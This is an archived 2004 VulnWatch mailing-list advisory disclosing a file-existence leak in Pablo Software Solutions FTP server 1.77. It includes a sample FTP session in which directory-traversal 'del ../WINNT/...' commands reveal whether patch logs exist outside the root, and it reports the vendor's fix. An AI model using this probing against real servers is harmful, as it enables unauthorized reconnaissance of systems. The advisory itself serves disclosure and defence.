[VulnWatch] Pablo Sofware Solutions FTP server can detect if a file exists outside the FTP root directory

From: scrap (webmaster@private)
Date: Sun Jan 18 2004 - 12:19:18 PST

Next message: KF: "[VulnWatch] SRT2004-01-17-0227 - BlackICE allows local users to become SYSTEM"

Previous message: KF: "[VulnWatch] Happy belated Personal Firewall day - SRT2004-01-17-0628 - Agnitum Optpost firewall allows Local SYSTEM access"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Pablo Sofware Solutions FTP server can detect if a file exists outside the FTP 
root directory 


.oO Overview Oo.

Pablo Software Solutions FTP server version 1.77 can detect if a file exists 
outside the FTP root directory.
Discovered on 2004, January, 11th
Vendor: Pablo Software Solutions (http://www.pablovandermeer.nl)

Pablo's FTP Server is a multi threaded FTP server for Windows 98/NT/XP. It 
comes with an easy to use interface and can be accessed from the system tray. 
The server handles all basic FTP commands and offers easy user account 
management and support for virtual directories. This FTP server can detect if 
a file exists outside the FTP root directory.


.oO Details Oo.

The vulnerability can be done using the MS-DOS ftp client. When you are logged 
on the server, you can send a del \..\<filename> supposed your root directory 
is c:\ftp_server
If <filename> exists, the FTP server answers "550 Permission denied." If 
<filename> doesn't exist, the FTP server answers "550 File not found."
In any case, the file is never deleted. That is normal.


.oO Exploit Oo.

Checking if a file exists on a remote system can be usefull to :

    * Fingerprint the OS. OSes don't have the same installed files by default. 
By this way, you can know if the remote system is Windows NT, or 2000 or 
XP...
    * Know the vulnerabilities of a system. By testing if 
"../WINNT/Q329115.log" exists, you can know if the remote system have this 
patch installed
    * Maybe some other interesting things...

Here is an example of the vulnerability :

C:\>ftp 127.0.0.1
Connecté à 127.0.0.1.
220 Welcome to Pablo's FTP Server
Utilisateur (127.0.0.1:(none)) : test
331 Password required for test
Mot de passe :
230 User successfully logged in.
ftp> dir
200 Port command successful.
150 Opening ASCII mode data connection for directory list.
-rwx------ 1 user group 0 Jan 11 18:18 ceci est le repertoire test.txt
226 Transfer complete
ftp : 85 octets reçus dans 0,00Secondes 84000,00Ko/sec.
ftp> dir ..
200 Port command successful.
550 "..": Permission denied. That is OK.
ftp> cd ..
550 "..": Permission denied. That is OK.
ftp> del ../WINNT/Q328310.log
550 Permission denied. File exists !
ftp> del ../WINNT/Q329115.log
550 File not found. File does not exists !
ftp> quit


.oO Solution Oo.

The vendor has been informed and has solved the problem.
Download Pablo's FTP server 1.8 at 
http://www.pablovandermeer.nl/ftp_server.html


.oO Discovered by Oo.

Arnaud Jacques aka scrap
webmaster@private
http://www.securiteinfo.com

Next message: KF: "[VulnWatch] SRT2004-01-17-0227 - BlackICE allows local users to become SYSTEM"
Previous message: KF: "[VulnWatch] Happy belated Personal Firewall day - SRT2004-01-17-0628 - Agnitum Optpost firewall allows Local SYSTEM access"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jan 18 2004 - 20:03:12 PST